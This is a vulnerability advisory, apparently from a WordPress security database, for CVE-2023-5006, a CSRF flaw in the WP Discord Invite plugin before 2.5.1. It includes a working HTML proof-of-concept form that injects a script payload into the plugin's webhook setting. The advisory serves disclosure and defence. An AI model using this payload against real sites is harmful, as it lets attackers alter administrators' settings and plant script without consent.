WordPress Plugin Vulnerabilities

WP Discord Invite < 2.5.1 - Arbitrary Settings Update via CSRF

Description

The plugin does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.

Proof of Concept

<html>
	<body>
		<form method="POST" action="http://127.0.0.1/wp-admin/admin.php?page=wp-discord-invite-count">
			<input type="hidden" name="wp-discord-invite-oauth" value="1"/>
			<input type="hidden" name="webhook" value='"><script>alert(1);</script>'/>
			<input type="submit" value="Submit">
		</form>
	</body>
<html>

Affects Plugins

Plugin icon
wp-discord-invite
Fixed in 2.5.1

References

CVE
CVE-2023-5006

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.4 (high)

Miscellaneous

Original Researcher
Enrico Marcolini, Claudio Marchesini
Submitter
Enrico Marcolini, Claudio Marchesini
Submitter website
https://www.dottormarc.it
Submitter twitter
dottormarc
Verified
Yes
WPVDB ID
d29bcc1c-241b-4867-a0c8-4ae5f9d1c8e8

Timeline

Publicly Published
2023-09-26 (about 7 months ago)
Added
2023-09-26 (about 7 months ago)
Last Updated
2023-09-26 (about 7 months ago)

Other

Published
Title
Published
2023-12-28
Title
Republish Old Posts < 1.27 - Cross-Site Request Forgery via rop_options_page
Published
2022-02-21
Title
Hide Admin Bar Based on User Roles < 3.1.0 - Settings Update via CSRF
Published
2024-04-10
Title
Sarada Lite < 1.1.3 - Cross-Site Request Forgery to Notice Dismissal
Published
2022-09-29
Title
Analytify < 4.2.3 - Cache Deletion via CSRF
Published
2022-11-21
Title
Booster for WooCommerce - Custom Role Creation/Deletion via CSRF